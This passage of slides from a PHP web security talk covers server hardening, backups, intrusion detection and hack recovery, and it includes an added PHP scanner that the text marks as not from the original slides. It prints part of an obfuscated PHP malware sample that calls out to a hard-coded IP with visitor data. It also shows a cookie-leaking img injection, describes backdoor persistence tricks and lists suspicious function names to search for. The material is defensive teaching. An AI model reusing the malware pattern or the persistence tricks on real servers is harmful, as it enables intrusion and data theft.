(which should be outside your webroot normally)
84. Protecting your web stack – Webserver
Don't run web server as root
Don't let web server user access anything outside web root
Detect and ban flood/scan attempts in Nginx :
http {
limit_conn_zone $binary_remote_addr zone=conn_limit_per_ip:10m;
limit_req_zone $binary_remote_addr zone=req_limit_per_ip:10m rate=5r/s;
server {
limit_conn conn_limit_per_ip 10;
limit_req zone=req_limit_per_ip burst=10 nodelay;
}
}
86. Protecting your web stack – Versions
Don't expose versions
PHP : expose_php = 0
Apache :
ServerTokens ProductOnly
ServerSignature Off
Nginx
server_tokens off;
87. Protecting your web stack – Database server
No access from the web required
Give it a private IP
Other websites on network ?
→ send traffic over SSL
1 user per DB
1 DB per user
1 DB per application
88. Protecting your web stack – Mail server
Setup SSL for POP3, IMAP, SMTP
Setup DomainKeys
Setup SPF (Sender Policy Framework)
89. Protecting your web stack – DNS server
Possible weak point in architecture
Controls web, MX (mail) records, anti-spam, etc.
DNS hijacking
DNS spoofing
90. Protecting your web stack
Use public/private key pairs for SSH, not passwords
Don't login as root
→ Use sudo for commands that really need it
Allow SSH access only from VPN
Running
Memcached ?
Gearman ?
… ?
→ Block external access
94. Lack of updates
Not updating system packages
Not updating frameworks and libraries
Not just main components
Doctrine
Bootstrap
Javascript libraries
etc.
Not updating webserver software
Not updating database server software
Recently :
Heartbleed (OpenSSL)
Shellshock (Bash)
Ghost (Glibc)
95. Protecting your web stack - firewalls
Separate or on-server
Default policy = deny all
Don't forget IPv6 !!!
Perform regular scans from external location
Use blacklists to keep certain IP ranges out
96. Protect your backups
Should be encrypted with public key
Private key should be stored in 2 separate locations
Backups should never be stored on same server
Backup server should pull backups
97. MySQL : use the binlog
Setup Master-Slave (even if you don’t have a Slave !)
Master creates binlog
Allows recovery to a specific second
Backup the binlogs for 7-10 days
MySQL backup : mysqldump with --opt --single-transaction
(preferably on slave to avoid locking users)
98. First action of a hacker
Make sure they don't lose the access they gained
Create new user → easy to detect
Install a custom backdoor
→ easy to detect with good IDS
Install a backdoor based on installed software
→ Example : start SSHD with different config on different port (remember firewall ?)
→ Harder to detect
→ Kill it... what happens ?
→ Probably restarts via cronjob
99. Using an Intrusion Detection System
Host-based Intrusion Detection System (HIDS)
Network-based Intrusion Detection System (NIDS)
100. Host-based Intrusion Detection System
Scans the file system for changes
New/deleted files
Modified files (based on checksum)
File permission changes
Old systems are standalone :
AIDE, Tripwire, AFICK
Easy to update by hacker, not recommended (unless combined with
backup system)
Intrusion detection by backup
Best Open Source tool = OSSEC
Client-server-based architecture → real-time notification that hacker
can't stop
Centralized updates
105. Decentralized alternative : Samhain
Can be used centralized or standalone
Log to syslog, send email, write to DB
Processing on the client
Improves processing speed
Requires CPU power on client
106. Network-based Intrusion Detection Systems
Snort
Open Source
Supported by Cisco (rules are not free)
Analyzes traffic, blocks malicious traffic
Huge user base, tons of addons
112. What's the problem with public wifi ?
Traffic can be intercepted
Traffic hijacking / injection
Forcing site to use HTTPS fixes it right ?
What if user goes to some other HTTP site and I inject <img src="http://yoursite.com/someurl"> ?
→ Session cookies are transmitted over HTTP
Use HSTS
HTTP Strict Transport Security
Tells browser to use only HTTPS connections
Strict-Transport-Security: max-age=expireTime [; includeSubDomains] [;
preload]
Chrome 4+, FF 4+, IE 11+, Opera 12+, Safari 7+
113. One IDS distro to rule them all
Security Onion
Based on Ubuntu
Contains all the IDS tools...
...and much more
114. You've been hacked ! Now what ? (1/4)
Take your application offline
→ Put up a maintenance page (on a different server)
Take the server off the public Internet
Change your SSH keys
Make a full backup
Check for cronjobs
Check access/error/... logs
(And give them to legal department)
Were any commits made from the server ?
→ Your server shouldn't be able to !
115. What a PHP hack might look like
eval(base64_decode('...'));
117. What a PHP hack might look like
$GLOBALS['_226432454_']=Array();
function _1618533527($i)
{
return '91.196.216.64';
}
$ip=_1618533527(0);
$GLOBALS['_1203443956_'] = Array('urlencode');
function _1847265367($i)
{
$a=Array('http://','/btt.php?
ip=','REMOTE_ADDR','&host=','HTTP_HOST','&ua=','HTTP_USER_AGENT','&ref=','HTTP_REFERER');
return $a[$i];
}
$url = _1847265367(0) .$ip ._1847265367(1) .$_SERVER[_1847265367(2)] ._1847265367(3) .
$_SERVER[_1847265367(4)] ._1847265367(5) .$GLOBALS['_1203443956_'][0]($_SERVER[_1847265367(6)])
._1847265367(7) .$_SERVER[_1847265367(8)];
$GLOBALS['_399629645_']=Array('function_exists', 'curl_init', 'curl_setopt', 'curl_setopt',
'curl_setopt', 'curl_exec', 'curl_close', 'file_get_contents');
function _393632915($i)
{
return 'curl_version';
}
118. What a PHP hack might look like - location
Changes to .htaccess
Files in upload directory
PHP code in files with different extension
New modules/plugins for Drupal/Wordpress
119. You've been hacked ! Now what ? (2/4)
Search system
preg_replace
base64_decode
eval
system
exec
passthru
Search system and database
script
iframe
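The search for these function names can be done on PHP tokens instead of raw text, which ignores comments and method calls such as $db->exec() but still reports names hidden in string literals, as in the obfuscated sample shown earlier. This is an added example, not code from the original slides: the function names are hypothetical and the sample source is constructed.

```php
<?php
// Added example. The name list is the one on the slide; everything else is hypothetical.

/** Function names to look for; eval is a language construct with its own token (T_EVAL). */
function suspiciousNames() {
    return array('preg_replace', 'base64_decode', 'system', 'exec', 'passthru');
}

/** Index of the nearest non-whitespace token in direction $step (-1 or 1), or -1. */
function neighbour(array $tokens, $i, $step) {
    for ($j = $i + $step; $j >= 0 && $j < count($tokens); $j += $step) {
        if (!is_array($tokens[$j]) || $tokens[$j][0] !== T_WHITESPACE) {
            return $j;
        }
    }
    return -1;
}

/** Return hits as arrays of line, kind ('call' or 'string') and name. */
function findSuspicious($source) {
    $names = suspiciousNames();
    $memberOps = array('T_OBJECT_OPERATOR', 'T_NULLSAFE_OBJECT_OPERATOR', 'T_DOUBLE_COLON', 'T_FUNCTION');
    $tokens = token_get_all($source);
    $hits = array();
    foreach ($tokens as $i => $t) {
        if (!is_array($t)) {
            continue;
        }
        list($id, $text, $line) = $t;
        if ($id === T_EVAL) {
            $hits[] = array('line' => $line, 'kind' => 'call', 'name' => 'eval');
        } elseif ($id === T_CONSTANT_ENCAPSED_STRING) {
            // A bare function name inside a string is how indirect calls hide
            $literal = strtolower(trim($text, "'\""));
            if (in_array($literal, $names, true)) {
                $hits[] = array('line' => $line, 'kind' => 'string', 'name' => $literal);
            }
        } elseif ($id === T_STRING || token_name($id) === 'T_NAME_FULLY_QUALIFIED') {
            $name = strtolower(ltrim($text, '\\'));
            $prev = neighbour($tokens, $i, -1);
            $next = neighbour($tokens, $i, 1);
            // Skip $obj->exec(), Foo::exec() and "function exec(" declarations
            $isMember = $prev >= 0 && is_array($tokens[$prev])
                && in_array(token_name($tokens[$prev][0]), $memberOps, true);
            if (in_array($name, $names, true) && !$isMember && $next >= 0 && $tokens[$next] === '(') {
                $hits[] = array('line' => $line, 'kind' => 'call', 'name' => $name);
            }
        }
    }
    return $hits;
}

/** Scan every file under $root that contains a PHP open tag, whatever its extension. */
function scanTree($root) {
    $report = array();
    $files = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($files as $file) {
        if (!$file->isFile() || $file->getSize() > 2 * 1024 * 1024) {
            continue;
        }
        $source = file_get_contents($file->getPathname());
        if ($source === false || strpos($source, '<?') === false) {
            continue;
        }
        $hits = findSuspicious($source);
        if ($hits) {
            $report[$file->getPathname()] = $hits;
        }
    }
    return $report;
}

// Constructed sample source; the payload is elided as on the slide.
$sample = <<<'PHP'
<?php
// exec() mentioned in a comment is not code
$db->exec('DELETE FROM cache');
$f = array('base64_decode');
eval($f[0]('...'));
echo preg_replace('/a/', 'b', $s);
PHP;

foreach (findSuspicious($sample) as $hit) {
    printf("line %d: %s (%s)\n", $hit['line'], $hit['name'], $hit['kind']);
}
```

Call scanTree() on a copy of the web root and compare the hits against a clean checkout from the versioning system; legitimate code uses some of these functions too, so every hit needs review.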
120. You've been hacked ! Now what ? (3/4)
Find out how the hack happened ;-)
Write an apology to your customers
Finally :
Reinstall the OS (from scratch !)
Update all packages to the latest version
Don't reinstall code from backup !
Install source code from versioning system
Restore DB from previous backup (use binary log file)
121. Restoring your database to a specific point
Turn on binary log
Usually for master-slave replication
Useful for fast recovery
Make sure it can handle >24h of data
Make a daily database backup
Make a db dump to a file (mysqldump, …)
Warning : locking danger → do this on the slave !
Backup the db dump file
To recover :
Restore the db dump file
Disable db access (webserver, internal users, phpMyAdmin, ...)
Import db dump file to db
Replay binary log (mysqlbinlog …)
122. You've been hacked ! Now what ? (4/4)
Install IDS
Get an external security audit on the code
Get an external security audit on the system/network setup
Change user passwords
Relaunch
Cross your fingers
123. Side note : GDPR
General Data Protection Regulation
New European privacy law
1 law for all member states
Takes effect May 25, 2018
Fines for data loss of up to
4% of annual turnover
or
20 million Euros
(whichever is higher)
124. GDPR – what is private data ?
Anything that identifies a private individual
A unique name
‘Mike Johnson’ is not very unique, but combined with other things it is
‘Wim Godden’ is
An e-mail address
An IP address
A combination of data
Order + address
...
125. GDPR – basic guidelines
Privacy by design
Security by design
Only store the private data that you really need
Procedures must be created for how data is :
Stored
Processed
Deleted
Backed up
These procedures will serve as a way to prove you’ve done all
you can
126. Takeaways
Think like a hacker
Can I steal data ? Can I DOS the site ?
Which techniques could I use to do it ?
Try it without looking at the code
Try it while looking at the code
Use SSL/HTTPS everywhere !
Block all traffic, then allow only what's needed
Sanitize/filter your input
Escape your output
Block flooders/scanners
Use an IDS
Never trust a hacked system
Prepare for GDPR
128. The software discussed (and more)
Password use in PHP
5.5+ : password_hash function : http://php.net/password_hash
< 5.5 : password_compat :
https://github.com/ircmaxell/password_compat
SSL certificates
RapidSSL FreeSSL : https://www.freessl.com/
Let's Encrypt (free) : https://letsencrypt.org/
StartSSL : https://www.startssl.com
Block access to .svn and .git :
http://blogs.reliablepenguin.com/2014/06/26/block-access-git-svn-fol
129. The software discussed (and more)
Webserver flood/scan detection
Nginx : http://nginx.com/resources/admin-guide/restricting-access/
Multi-webserver : http://www.fail2ban.org
Proxy-based :
http://www.ecl-labs.org/2011/03/17/roboo-http-mitigator.html
Protecting your mail server
SPF and DomainKeys :
http://www.pardot.com/faqs/administration/adding-spf-domainkeys-dns/
DNS
Hijacking : http://www.gohacking.com/dns-hijacking/
Spoofing :
http://www.windowsecurity.com/articles-tutorials/authentication_and_encryptio
IPv6 – don't forget to firewall it the same way :
https://www.sixxs.net/wiki/IPv6_Firewalling
130. The software discussed (and more)
Slow HTTP DOS attacks :
https://www.acunetix.com/blog/articles/slow-http-dos-attacks-mitigate
IDS
PHP
PHPIDS : https://github.com/PHPIDS/PHPIDS
Exposé : https://github.com/enygma/expose
Host-based
OSSEC : www.ossec.net
Samhain : http://www.la-samhna.de/samhain/
AIDE : http://aide.sourceforge.net/
Network-based
Snort : https://www.snort.org/
Suricata : http://suricata-ids.org/
All in one : Security Onion : http://blog.securityonion.net/
131. The software discussed (and more)
Penetration testing live CD :
Backtrack Linux : http://www.backtrack-linux.org/
Kali Linux : https://www.kali.org/
Automatic scanning tools :
Nessus : http://www.tenable.com/products/nessus-vulnerability-scanner
Wapiti : http://wapiti.sourceforge.net/
Nexpose : http://www.rapid7.com/products/nexpose/
Web App Scanning / Auditing :
w3af : http://w3af.org/
Wapiti : http://wapiti.sourceforge.net/
Nikto2 : https://cirt.net/nikto2
134. In case you're interested
Tutorial : 2,5h - 3h
Training : 2 days
1,5 days of interactive training (partly slides, partly hands-on)
Try out different security issues
Experiment on local virtualboxes and physical machines we bring along
0,5 day of auditing
Your code
Your servers
Your network
As a global team effort or in smaller teams
More details : https://cu.be/training